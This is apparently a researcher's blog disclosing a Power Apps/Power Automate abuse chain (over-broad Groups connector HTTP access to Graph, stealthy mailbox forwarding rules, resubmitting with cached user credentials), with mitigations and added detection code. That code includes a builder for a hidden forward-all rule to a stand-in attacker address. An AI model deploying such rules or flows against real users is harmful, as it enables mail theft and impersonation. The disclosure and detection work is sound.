DEV Community

david wyatt

The Super Villain Power App

Callout: this blog was written a while ago, but after raising one of the issues below with the Microsoft Security Response Center I was asked to wait until they had rolled out a fix.

You may have seen a new tenant feature to block manual resubmits; yep, that's the fix, and yes, it's my fault, sorry.

[screenshot: resubmit block tenant setting]

[screenshot: Microsoft Learn docs, "Resubmit flow runs initiated by instant triggers"]

So if anything is a little out of date, you now know why 😎


One day you get a message about testing a new app. It could be from someone on your team, a colleague, or even a generic reach-out-for-help email. They are all internal emails, and it's just a Power App, so what harm can it do?

[screenshot: group permission prompt]

You open it; it requests to use Office 365 Groups, which makes sense for the app. There is also no list of permissions, but as you have no group rights it doesn't worry you.
The app opens, then errors. You send an email back letting them know it isn't working and forget all about it.

[screenshot: app login]

The problem is you have just handed your Office 365 keys to a hacker.

I've spoken about the risks of Power App hacking before here, but if that one was a villain, this new app would be a super villain. See, not only do I have access to everything (not just Office 365 Groups), I can run nearly any action, at will, forever. I can even spy on your emails with zero effort, for eternity.

Want to know how? Let me show you.

First, although our Super Villain is powerful, its real power comes from its sidekick, Power Automate. This Super Villain duo has three superpowers:

  1. Unlocked Graph API
  2. HTTP Graph API Power
  3. Cached Credentials

The app is really simple: a one-screen Power App that calls a flow. The flow uses the Office 365 Groups connector, with the connection set to 'Provided by run-only user', so it runs with the credentials of whoever opens the app. The app sits in an environment where the developer has full access, e.g. Default.


1. Unlocked Graph API

The Office 365 Groups connector should give you access to just the groups Graph API endpoints, but when its HTTP request action was released there must have been an error, as nearly all Graph endpoints were accepted.

So this means that even though the user only approves this one connector, they have in fact approved access to:

  • Outlook
  • OneDrive
  • Teams
  • SharePoint
  • Planner
  • OneNote, and more

So the Super Villain app with its sidekick can now, in theory, do whatever it wants, and you wouldn't even know it had access.

Some scary examples are:

Send email as the user
We have the power to send any email to anyone, and it will appear as if the user sent it (great for approving things).
[screenshot: send email]
We can even set it not to save to the user's Outlook Sent folder (the sendMail request's saveToSentItems flag).

[screenshot: not save to sent]

Edit OneDrive files
We can list all of the user's OneDrive (or, in the example below, the most recently edited files) and then share them with ourselves. We can then not only read them, but edit them.

[screenshot: share files]

Read calendar
All of the user's meetings can be viewed, including notes and agendas.
[screenshot: calendar]

Read emails
Any email in any folder can be read or downloaded.
[screenshot: read emails]

Search
We can even search all of the user's emails and files for keywords.
[screenshot: search]

And just for mischievousness we could:

Create/cancel meetings
[screenshot: create meeting]

Full video: https://youtu.be/BqYLgV_iOYQ
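The point of the section above is that the Groups connector's HTTP action accepts calls far outside the groups endpoints. What follows is an added example, not code from this post or from Microsoft: a small Python scope check of the kind a DLP rule for connector HTTP actions would need, with a per-connector allowlist that is assumed for illustration. It also shows why a naive prefix test is not enough: a URL with a `..` segment passes the prefix test but normalises to an out-of-scope endpoint, and a userinfo trick (`graph.microsoft.com@evil.example`) silently changes the host. The sample actions are constructed here to mirror the calls the examples above rely on (sendMail, drive/recent, invite, calendarView, messages, search, messageRules).

```python
"""Scope check for Graph calls issued through a connector's HTTP action.

Added example: the allowlists below are assumed for illustration and are not
Microsoft's actual connector policy. The sample actions are constructed to
mirror the calls used in the post's examples.
"""
import posixpath
import re
from urllib.parse import urlsplit

GRAPH_HOST = "graph.microsoft.com"

# Assumed per-connector allowlists: the Groups connector should only ever reach
# the groups endpoints (plus the caller's own group memberships); the Outlook
# connector should only reach mail and calendar. Matched against the canonical path.
CONNECTOR_SCOPE = {
    "Office 365 Groups": [
        r"^/(v1\.0|beta)/groups(/|$)",
        r"^/(v1\.0|beta)/me/memberof(/|$)",
    ],
    "Office 365 Outlook": [
        r"^/(v1\.0|beta)/me/(messages|mailfolders|sendmail|events|calendar|calendarview)(/|$)",
    ],
}


def naive_check(url: str) -> bool:
    """A prefix test that looks sufficient and is not (kept to show the bypass)."""
    return url.startswith("https://graph.microsoft.com/v1.0/groups")


def canonical_path(url: str):
    """Return the normalised, lower-cased path if the URL really targets Graph, else None."""
    parts = urlsplit(url)
    # hostname is lower-cased and excludes userinfo, so graph.microsoft.com@evil fails here
    if parts.scheme.lower() != "https" or parts.hostname != GRAPH_HOST:
        return None
    path = re.sub(r"/{2,}", "/", parts.path.lower())   # collapse repeated slashes
    return posixpath.normpath(path)                     # resolve '.' and '..' segments


def in_scope(connector: str, url: str) -> bool:
    """True if the call stays inside the allowlist for the connector it rides on."""
    path = canonical_path(url)
    if path is None:
        return False
    return any(re.match(pattern, path) for pattern in CONNECTOR_SCOPE.get(connector, []))


# Constructed sample: what the post's flow sends through the Groups connector's
# HTTP action. Only the first call is something a Groups connector should make.
SAMPLE_ACTIONS = [
    ("Office 365 Groups", "GET",  "https://graph.microsoft.com/v1.0/groups"),
    ("Office 365 Groups", "POST", "https://graph.microsoft.com/v1.0/me/sendMail"),
    ("Office 365 Groups", "GET",  "https://graph.microsoft.com/v1.0/me/drive/recent"),
    ("Office 365 Groups", "POST", "https://graph.microsoft.com/v1.0/me/drive/items/ITEMID/invite"),
    ("Office 365 Groups", "GET",  "https://graph.microsoft.com/v1.0/me/calendarView?startDateTime=2024-01-01T00:00:00Z&endDateTime=2024-12-31T00:00:00Z"),
    ("Office 365 Groups", "GET",  "https://graph.microsoft.com/v1.0/me/messages"),
    ("Office 365 Groups", "POST", "https://graph.microsoft.com/v1.0/search/query"),
    ("Office 365 Groups", "POST", "https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules"),
    # passes naive_check(), but normalises to /v1.0/me/sendmail
    ("Office 365 Groups", "POST", "https://graph.microsoft.com/v1.0/groups/../me/sendMail"),
]


def audit(actions):
    """Return the (connector, method, url) entries that fall outside the connector's scope."""
    return [action for action in actions if not in_scope(action[0], action[2])]


if __name__ == "__main__":
    for connector, method, url in audit(SAMPLE_ACTIONS):
        print(f"OUT OF SCOPE  {connector}: {method} {url}")
```

The allowlist is path-based only; a real policy would also restrict HTTP methods (a Groups connector has no business issuing a POST to sendMail even if the path check were looser) and would be enforced by the platform, not by the flow author.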

Microsoft has since released a version 2 of the connector and removed version 1 from the connector list, but existing v1 actions still run and can be copied over into new flows.

[screenshot: Groups v1 in new UI]

2. HTTP Graph API Power

I love the power of the HTTP connectors, I even wrote a blog about it here, but with great power comes great responsibility. Because we have unlocked the Graph API, our Super Villain now has a lot more power than normal connectors give. A particularly dangerous one is the Outlook message rules API, which lets us set rules on your mailbox. We can delete, move, or forward messages (or all three); in fact we can do a lot with this one API:

Property               Type                  Values
assignCategories       String collection     Array of categories
copyToFolder           String                Folder ID
delete                 Boolean               true
forwardAsAttachmentTo  recipient collection  Array of email addresses
forwardTo              recipient collection  Array of email addresses
markAsRead             Boolean               true, false
markImportance         importance            low, normal, high
moveToFolder           String                Folder ID
permanentDelete        Boolean               true (desktop client only)
redirectTo             recipient collection  Array of email addresses
stopProcessingRules    Boolean               true, false

Full details at learn.microsoft.com (the Graph messageRuleActions resource type).

So when you logged into the Super Villain app, you called a flow that had one action: the Office 365 Groups connector's HTTP request (note: if this connector has been fixed, you can still use the Office 365 Outlook HTTP action; the user would just know you have Outlook access).

[screenshot: flow run]

The end result is a rule set up server-side on the mailbox, so every email is forwarded to any mailbox you want, even if the user never opens Outlook desktop.

[screenshot: forward rule]

Check out below: here we see a confidential email sent and then forwarded on.

[screenshot: email forward]

Full video: https://youtu.be/r_9ADbRREXk
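An added example, not part of the original post: the JSON body the flow's HTTP action would POST to `/me/mailFolders/inbox/messageRules` to create the forwarding rule described in this section, built with the real messageRuleActions properties from the table above, plus the detection logic a responder would run over a mailbox's rules. The sample rules and the tenant domain (`contoso.com`) are constructed for illustration. The detector flags forwarding or redirecting to an external domain, rules with no conditions (which apply to every message), actions that hide the message from the victim, and blank or punctuation-only rule names.

```python
"""Build the forwarding rule described above, and flag rules like it.

Added example. The request body uses the real Graph messageRule schema; the
tenant domain and the sample rules are constructed for illustration.
"""

INTERNAL_DOMAINS = {"contoso.com"}          # assumed tenant domain(s)

EXFIL_KEYS = ("forwardTo", "forwardAsAttachmentTo", "redirectTo")
HIDE_KEYS = ("delete", "permanentDelete", "markAsRead", "moveToFolder")


def build_forward_rule(to_address: str, name: str = ".") -> dict:
    """Body for POST https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules.

    No 'conditions' block, so the rule matches every incoming message; a
    one-character displayName keeps it easy to overlook in the rules list.
    """
    return {
        "displayName": name,
        "sequence": 1,
        "isEnabled": True,
        "actions": {
            "forwardTo": [{"emailAddress": {"address": to_address}}],
            "markAsRead": True,
            "stopProcessingRules": False,
        },
    }


def _domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


def rule_findings(rule: dict, internal_domains=INTERNAL_DOMAINS) -> list:
    """Reasons a messageRule looks malicious; an empty list means nothing suspicious."""
    findings = []
    actions = rule.get("actions") or {}
    for key in EXFIL_KEYS:
        for recipient in actions.get(key) or []:
            address = recipient.get("emailAddress", {}).get("address", "")
            if address and _domain(address) not in internal_domains:
                findings.append(f"{key} to external address {address}")
    if not rule.get("conditions"):
        if findings:
            findings.append("no conditions: applies to every message")
        elif actions.get("delete") or actions.get("permanentDelete"):
            findings.append("no conditions: deletes every message")
    hides = [key for key in HIDE_KEYS if actions.get(key)]
    if findings and hides:
        findings.append("also hides the message (" + ", ".join(hides) + ")")
    if not rule.get("displayName", "").strip(" ._-"):
        findings.append("empty or punctuation-only displayName")
    return findings


def scan(rules, internal_domains=INTERNAL_DOMAINS) -> dict:
    """Map rule index to its findings, for every rule that has any."""
    report = {}
    for index, rule in enumerate(rules):
        findings = rule_findings(rule, internal_domains)
        if findings:
            report[index] = findings
    return report


# Constructed sample: one housekeeping rule and two rules an attacker would plant.
SAMPLE_RULES = [
    {
        "displayName": "Newsletters",
        "isEnabled": True,
        "conditions": {"senderContains": ["newsletter"]},
        "actions": {"moveToFolder": "AAMkFOLDERID", "stopProcessingRules": True},
    },
    build_forward_rule("villain@evil.example"),
    {   # redirect plus delete: the victim never sees the message at all
        "displayName": "",
        "isEnabled": True,
        "conditions": {"subjectContains": ["invoice", "password"]},
        "actions": {
            "redirectTo": [{"emailAddress": {"address": "drop@evil.example"}}],
            "delete": True,
        },
    },
]


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_RULES).items():
        print(f"rule {index} ({SAMPLE_RULES[index]['displayName']!r}):")
        for finding in findings:
            print("  -", finding)
```

Because the rule lives server-side, the same checks apply whether the rules were pulled via Graph (`GET /me/mailFolders/inbox/messageRules`) or exported from Exchange Online; the shape above is the Graph one. Forwarding to an internal address is deliberately not flagged on its own, since that is a common legitimate delegation pattern.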

3. Cached Credentials

At least with the above vulnerabilities the attack has to be pre-planned and can only run each time the user opens the app. Well, no, and that's because Power Automate caches the user's credentials and allows the flow owner to resubmit the run.

This means that one login to the app means you have given access indefinitely. All the Super Villain has to do is edit the flow, then press the test button and resubmit. The user's credentials are reused, but they never know. This means whatever connectors were used by the app user can now be used by the flow owner, even for different actions than were originally in the flow.

[screenshot: resubmit flow]


With these exploits used in tandem, the Super Villain has full access. Even if the Office 365 Groups HTTP action is removed (as Microsoft has started to do), all we are doing is removing the master key, not the keys. All the Villain would have to do is include each connection separately (how easy would it be to add a plausible reason for Outlook, OneDrive, etc.?).


So who is the Super Hero to our Super Villain? That can only be Microsoft. They need to:

  • Block Office 365 Groups HTTP v1
  • Enforce DLP on HTTP actions inside connectors the way it already works for custom connectors (block specific URLs)
  • List the actual rights the app uses (e.g. not 'Outlook' but 'Reads emails')
  • Show the flows called by the app
  • Notify the user if a run is resubmitted with 'Provided by run-only user' credentials, or block resubmits when using run-only users' credentials

We see how talented the dev team is with all the amazing updates they keep rolling out, so we know they can do it. But until then, users need to be very wary of using apps from untrusted sources, and platform admins should push as much as possible out of Default into controlled environments with change management.

Full Demo Video: https://youtu.be/qTwFlmoCNZ4


Back to today: as you can see, Microsoft have been busy. Granular detail on what permissions the app is using with the connection is out (the more important flow part is in progress). HTTP actions are still a risk, especially as they don't have connector controls like the standard HTTP action. As for the cached credentials, the fix is in my opinion a little overkill. The significant impact on people's workflows means most are turning it off; I hope a future update limits it to specific environments (cough, the Default), or to when using someone else's connections.


I've had a few requests for a mailing list to alert you to new blogs. If you would like to get notified every time I release a blog (I also do a few in the Power Platform Community), subscribe below.

You will be pleased to know I built the mailing system myself in Power Automate, so if it doesn't work you know why 😎

Top comments (1)

Bala Madhusoodhanan

Graph API has so many powerful capabilities. Have to explore a bit more on this topic.